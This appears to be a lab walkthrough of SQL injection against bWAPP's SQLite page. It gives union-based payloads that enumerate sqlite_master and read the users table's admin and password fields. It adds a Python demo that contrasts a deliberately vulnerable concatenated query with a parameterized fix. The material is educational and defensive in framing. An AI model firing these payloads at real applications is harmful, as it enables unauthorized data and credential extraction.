SQL Injection (SQLite)
First of all, SQLite contains a built-in table, "sqlite_master", that stores five fields: type, name, tbl_name, rootpage, and sql. The name field stores all the table names, including all the user tables; the sql field holds all the table creation statements, that is, the structure of each table. Start below.
1. Input "title=1"; the error is "error:hy000". I did not find out what this error is; it may be the sign of an SQLite error.
2. Determine the number of fields, and see which field positions are displayed:
Enter "title=1' order by 6--+": normal. Enter "title=1' order by 7--+": error.
Enter "title=1' union select 1,2,3,4,5,6--+".
3. Query the table names:
Enter "title=1' union select 1,2,3,tbl_name,5,6 from sqlite_master--+".
4. Query the users table structure, that is, the field names:
Enter "title=1' union select 1,2,3,sql,5,6 from sqlite_master--+".
You can see that the table is named users, and the more important fields are admin, password, email; Of course not the admin.
5. Query the contents of the fields:
Enter "title=1' union select 1,2,3,admin,5,6 from users--+".
Here only one value can be queried at a time; the MySQL group_concat() function cannot be used. There may be other methods. I don't know of one; if any expert does, please share, and thank you in advance.
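Why steps 2 and 3 work, and what stops them, shown as an added example that is not part of the original page and is not bWAPP's code. It uses Python's sqlite3 module with a constructed in-memory database; the table "movies", its column names, the sample rows and the function names are assumptions made for illustration.

```python
import sqlite3

def make_db():
    """Constructed in-memory database: a 6-column table plus a users table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE movies (id INTEGER, title TEXT, release_year TEXT,
                             main_character TEXT, genre TEXT, imdb TEXT);
        CREATE TABLE users (id INTEGER, admin TEXT, password TEXT, email TEXT);
        INSERT INTO movies VALUES
            (1, 'Example Movie', '2000', 'Example Hero', 'action', 'x0');
        INSERT INTO users VALUES
            (1, 'constructed-admin', 'constructed-hash', 'a@example.invalid');
    """)
    return db

def search_vulnerable(db, title):
    # Before: the input is concatenated into the statement text, so a quote
    # in the input ends the string literal and the rest is parsed as SQL.
    sql = "SELECT * FROM movies WHERE title = '" + title + "'"
    return db.execute(sql).fetchall()

def search_parameterized(db, title):
    # After: the input is bound as a value and is only ever compared
    # against the title column, whatever characters it contains.
    return db.execute(
        "SELECT * FROM movies WHERE title = ?", (title,)
    ).fetchall()

# Step 3 input from the walkthrough ("+" in the URL decodes to a space).
STEP3_INPUT = "1' union select 1,2,3,tbl_name,5,6 from sqlite_master-- "

if __name__ == "__main__":
    db = make_db()
    # Concatenated query: rows from sqlite_master appear in the 4th column.
    print("concatenated :", search_vulnerable(db, STEP3_INPUT))
    # Bound parameter: the same input matches no title, so no rows.
    print("parameterized:", search_parameterized(db, STEP3_INPUT))
    # A normal search still works with the bound parameter.
    print("normal search:", search_parameterized(db, "Example Movie"))
    # Step 2: "order by 7" on a 6-column result raises an SQLite error,
    # which is the kind of error the page reports in steps 1 and 2.
    try:
        search_vulnerable(db, "1' order by 7-- ")
    except sqlite3.OperationalError as exc:
        print("order by 7   :", exc)
```

The error raised in the last step is also a useful detection signal: database errors triggered by request parameters are worth logging and alerting on rather than echoing back to the client.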
bWAPP SQL injection: sqli_11.php